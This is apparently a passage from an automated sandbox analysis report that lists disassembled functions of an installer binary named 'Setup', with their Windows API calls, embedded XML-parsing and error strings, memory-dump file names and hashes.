                                                                                                                                                                    • Opcode ID: ea19760fd7d7c15a8a1a735b082662a20c1ce8f437ae49722ff2ccb88c837730
                                                                                                                                                                    • Instruction ID: a5d64e261a4771dd7567e8298bb35497fe0f18313c5d4bd7c3fb3c9abcdd6592
                                                                                                                                                                    • Opcode Fuzzy Hash: ea19760fd7d7c15a8a1a735b082662a20c1ce8f437ae49722ff2ccb88c837730
                                                                                                                                                                    • Instruction Fuzzy Hash: BC11E17A800214FBDB009BA5C904FAFFBBDEF41B14B00803AE515E3940EB35DA10DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAF8D1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DAF8D8
                                                                                                                                                                    • GetCommandLineW.KERNEL32(00000044,69DA8323,00000000), ref: 69DAF8EA
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                    • __time64.LIBCMT ref: 69DAFA7B
                                                                                                                                                                      • Part of subcall function 69DA72E4: __EH_prolog3_catch.LIBCMT ref: 69DA72EB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch$CommandH_prolog3Line__time64
                                                                                                                                                                    • String ID: %TEMP%\$Setup
                                                                                                                                                                    • API String ID: 3716462386-3413213476
                                                                                                                                                                    • Opcode ID: 0310d3aaffa008e06b594965ebb85a61e1aa3e87ead707fd7a90f497948594c2
                                                                                                                                                                    • Instruction ID: 53e34b190e72f8105a27a5e97f8ac81a5d2c2d2eae3b3841a1930c85144fc6dc
                                                                                                                                                                    • Opcode Fuzzy Hash: 0310d3aaffa008e06b594965ebb85a61e1aa3e87ead707fd7a90f497948594c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E713675900249DFCF01CFE8C984AEEBBB5BF49318F2481A9E411BB790DB359A44CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D93EB2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D93EB9
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
                                                                                                                                                                    • API String ID: 431132790-3784926136
                                                                                                                                                                    • Opcode ID: 72fb9bcb5aa28e86a53b15606aae2c04656032c93b28fee6fd35d9081ae773a8
                                                                                                                                                                    • Instruction ID: df3abe5fb780f359ed13b5bc24437539500622d1f2a006f047798764b734b1f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 72fb9bcb5aa28e86a53b15606aae2c04656032c93b28fee6fd35d9081ae773a8
                                                                                                                                                                    • Instruction Fuzzy Hash: F5514C75904249EFDF10DFA8C985AAEBBB8AF09318F148169F815EB781C734DA05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA5691 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA5698
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,?), ref: 69DA5735
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000001,?), ref: 69DA57C3
                                                                                                                                                                    Strings
                                                                                                                                                                    • Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 69DA57FB
                                                                                                                                                                    • pLocalPath is NULL!!!!!!, xrefs: 69DA585B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$ExistsFileH_prolog3Relative
                                                                                                                                                                    • String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
                                                                                                                                                                    • API String ID: 1035510722-3253188715
                                                                                                                                                                    • Opcode ID: 6fcabd89d615d9edd42d477455e2fb8f453ca4b1ceb23fcd373f3bb5f1a13e45
                                                                                                                                                                    • Instruction ID: 8342c38e686595e37f6ed595fd18d4dd7d3e79fb17cc89d7a3f7ffc228785a3d
                                                                                                                                                                    • Opcode Fuzzy Hash: 6fcabd89d615d9edd42d477455e2fb8f453ca4b1ceb23fcd373f3bb5f1a13e45
                                                                                                                                                                    • Instruction Fuzzy Hash: CF51CF76800149EFDB10DFA8C844AEEBBB8AF15358F148175E520EBB91C7349E55CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D80E96 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D80E9D
                                                                                                                                                                      • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D81011
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: , xrefs: 69D80F73
                                                                                                                                                                    • must have exactly 2 child nodes, xrefs: 69D80F88
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D80F63
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: must have exactly 2 child nodes$ParameterInfo.xml$schema validation failure:
                                                                                                                                                                    • API String ID: 2489616738-936724439
                                                                                                                                                                    • Opcode ID: 08a9ad82e7520e1cddbf9d1a0c7aed847d1242cf93f01ea53876131fe82937a3
                                                                                                                                                                    • Instruction ID: a55a51ec81041a8b39cc75f7c6613c596b923e44d22ade0d43be2c6b6224265a
                                                                                                                                                                    • Opcode Fuzzy Hash: 08a9ad82e7520e1cddbf9d1a0c7aed847d1242cf93f01ea53876131fe82937a3
                                                                                                                                                                    • Instruction Fuzzy Hash: E4514D75901245EFDB11DFE8C984BAEBBB8AF09318F14C168E115DB681CB35EA05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D811F6 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D811FD
                                                                                                                                                                      • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8132C
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: Not must have exactly 1 child node, xrefs: 69D8129F
                                                                                                                                                                    • Not, xrefs: 69D81240
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D812AD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: Not$ParameterInfo.xml$schema validation failure: Not must have exactly 1 child node
                                                                                                                                                                    • API String ID: 2489616738-1102589135
                                                                                                                                                                    • Opcode ID: c4992b153fbd55a51628324d41e35cbbf38d2d5b7fa017e5cc467553e0c2de32
                                                                                                                                                                    • Instruction ID: 7d0cca9f793c7f047fabdad66287428abbbb44c67470b2f502c72635e6f08406
                                                                                                                                                                    • Opcode Fuzzy Hash: c4992b153fbd55a51628324d41e35cbbf38d2d5b7fa017e5cc467553e0c2de32
                                                                                                                                                                    • Instruction Fuzzy Hash: B3414171900249EFDB11DBE8C945FAEBBB8BF15318F148168E115EB691CB35EA04CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB972F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D85044: __EH_prolog3.LIBCMT ref: 69D8504B
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,F0D05EFD,?,?,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794), ref: 69DB97B2
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB985E
                                                                                                                                                                      • Part of subcall function 69D84798: __EH_prolog3.LIBCMT ref: 69D8479F
                                                                                                                                                                      • Part of subcall function 69D850D5: __EH_prolog3_catch.LIBCMT ref: 69D850DC
                                                                                                                                                                      • Part of subcall function 69D850D5: CoInitialize.OLE32(00000000), ref: 69D8512A
                                                                                                                                                                      • Part of subcall function 69D850D5: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,00000738,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D85148
                                                                                                                                                                      • Part of subcall function 69D850D5: CoUninitialize.OLE32(02602230,?,succeeded,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D851E6
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB9818
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB9833
                                                                                                                                                                    Strings
                                                                                                                                                                    • Loading localized engine data for language %d from %s, xrefs: 69DB977B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
                                                                                                                                                                    • String ID: Loading localized engine data for language %d from %s
                                                                                                                                                                    • API String ID: 509998568-3315213612
                                                                                                                                                                    • Opcode ID: dae7116aba91969c80c9e6557b82f8393c50517869752903092f098962adf288
                                                                                                                                                                    • Instruction ID: 03e2d4df2cf8d8e9e0e5127a98dfb81fe87aca960315723f8fa0b5e735052bbc
                                                                                                                                                                    • Opcode Fuzzy Hash: dae7116aba91969c80c9e6557b82f8393c50517869752903092f098962adf288
                                                                                                                                                                    • Instruction Fuzzy Hash: 48414E76008380AFD711DF64CC45E9FBBECAF95328F004A29F59597691DB34D908CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D856A3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
                                                                                                                                                                      • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
                                                                                                                                                                      • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                      • Part of subcall function 69D857E5: __EH_prolog3.LIBCMT ref: 69D857EC
                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                      • Part of subcall function 69D7A8CC: SetFilePointer.KERNEL32(?,00000000,69D6A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 69D7AA49
                                                                                                                                                                      • Part of subcall function 69D7A8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AA97
                                                                                                                                                                      • Part of subcall function 69D7A8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 69D7AAAC
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D8578A
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D85799
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D857C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
                                                                                                                                                                    • String ID: ParameterInfo.xml$UiInfo.xml
                                                                                                                                                                    • API String ID: 3873923459-386449131
                                                                                                                                                                    • Opcode ID: 6aa75d2d4bbc9222ba7cda1daa53f162696523a955ef271b738a2aff186a284e
                                                                                                                                                                    • Instruction ID: 824b1f9f0116f8a02dee22c057fd130dfe2c7609745570ce3f362450a4f813d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 6aa75d2d4bbc9222ba7cda1daa53f162696523a955ef271b738a2aff186a284e
                                                                                                                                                                    • Instruction Fuzzy Hash: 2231BDB6408345EBCB00DF68CD40E4BBBE8FF95628F405A2DF490D7691D735D8088BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D819AD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D819B4
                                                                                                                                                                      • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D81ADE
                                                                                                                                                                    Strings
                                                                                                                                                                    • can only have one logical or arithmietic expression for a child node, xrefs: 69D81A54
                                                                                                                                                                    • schema validation failure: , xrefs: 69D81A40
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D81902, 69D81A2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                                                                                                                                    • API String ID: 2489616738-4045823434
                                                                                                                                                                    • Opcode ID: cfec078a6797511c6ee6d969818325e5b014ac80b34cecb6bf2a2ee88a1467ba
                                                                                                                                                                    • Instruction ID: d41c5e69e767cec03f6b8b1ee2822472a6281a7fc99cd9e21be2ec630df5850d
                                                                                                                                                                    • Opcode Fuzzy Hash: cfec078a6797511c6ee6d969818325e5b014ac80b34cecb6bf2a2ee88a1467ba
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C413075900249EFDB10DFE8C944BAEBBB8BF05318F14C165E425EB681CB35DA05CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D81D3D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D819AD: __EH_prolog3.LIBCMT ref: 69D819B4
                                                                                                                                                                      • Part of subcall function 69D819AD: __CxxThrowException@8.LIBCMT ref: 69D81ADE
                                                                                                                                                                      • Part of subcall function 69D78AAC: __EH_prolog3.LIBCMT ref: 69D78AB3
                                                                                                                                                                      • Part of subcall function 69D78AAC: __CxxThrowException@8.LIBCMT ref: 69D78B39
                                                                                                                                                                      • Part of subcall function 69D792D1: __EH_prolog3.LIBCMT ref: 69D792D8
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D81E11
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                                                                                                    • String ID: ApplicableIf$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                                                                                                                                    • API String ID: 2724732616-3920316726
                                                                                                                                                                    • Opcode ID: a0bc3cc61afbfcdbb45971aa35cafa83819d83f4c6d06a318c632d6ef03edd4a
                                                                                                                                                                    • Instruction ID: ad210e37fe453bce26ed326fde02fccedb50874f6190bc527921eeefc50489ef
                                                                                                                                                                    • Opcode Fuzzy Hash: a0bc3cc61afbfcdbb45971aa35cafa83819d83f4c6d06a318c632d6ef03edd4a
                                                                                                                                                                    • Instruction Fuzzy Hash: 50213D75810248EBCF11DBE8C944EDE7BB8AF15318F54D168F124ABA91C7359B188772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB360F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 69DB365F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB3669
                                                                                                                                                                      • Part of subcall function 69D77479: __EH_prolog3.LIBCMT ref: 69D77480
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB368B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                                                                                                                                    • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                                                                                                                                    • API String ID: 3752544998-2579124284
                                                                                                                                                                    • Opcode ID: de67a4823861c67728b8989b0fb3d6c316bc3417d54c51e97a2e00ee9db91cb2
                                                                                                                                                                    • Instruction ID: 8dd08c802d887ee5322cb0bf332ddde054cc1d70be4237465d136aff54a4d820
                                                                                                                                                                    • Opcode Fuzzy Hash: de67a4823861c67728b8989b0fb3d6c316bc3417d54c51e97a2e00ee9db91cb2
                                                                                                                                                                    • Instruction Fuzzy Hash: CA1190B4A00209EFDF04DFA9C999C6EF7F9FF48304B11482DE442A7241DB70A900CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ED073 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                                                                                                    Download Yara Rule
